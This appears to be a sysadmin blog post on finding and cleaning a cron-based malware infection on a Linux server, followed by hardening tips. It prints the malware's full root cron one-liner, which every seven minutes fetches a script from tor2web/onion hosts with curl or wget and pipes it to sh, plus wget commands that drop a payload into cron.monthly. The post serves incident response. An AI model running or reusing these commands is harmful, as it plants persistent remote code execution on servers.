[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux
1. Malicious Processes
A. Identify the processes and the its URL name, in below case its an7kmd2wp4xo7hpr.tor2web.su
B. Use command ps aux
root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d2. Malicious Crons
A. Now use the same URL name and grep it in whole server
B. Command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab
[[email protected] ~]# cat /etc/cron.d/root */7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh & [[email protected] ~]# cat /etc/crontab */7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
Solutions:-
A. Remove the malicious codes from crons or wherever you find and for the time being, put chattr on them as well B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab C. - Change root password instantly - Remove all Authorized keys from all users which is not yours ls -lahd /home/*/.ssh/auth* ls -lahd /root/.ssh/auth* - ClamAV - Antivirus - Maldet - Malware Detector - Restricting SSH from particular IPs/VPN - Restricting MySQL from particular IPs/VPN - CSF Firewall - LFD Login Failure Daemon - WAF Web Application Firewall - ModSecurity with HTTP/Apache - Avoid using MySQL root user pass in Application code and create a non root mysql user. - Proper permissions and ownership of code files like of 755 for dirs and 644 for files. - Non standard SSH port
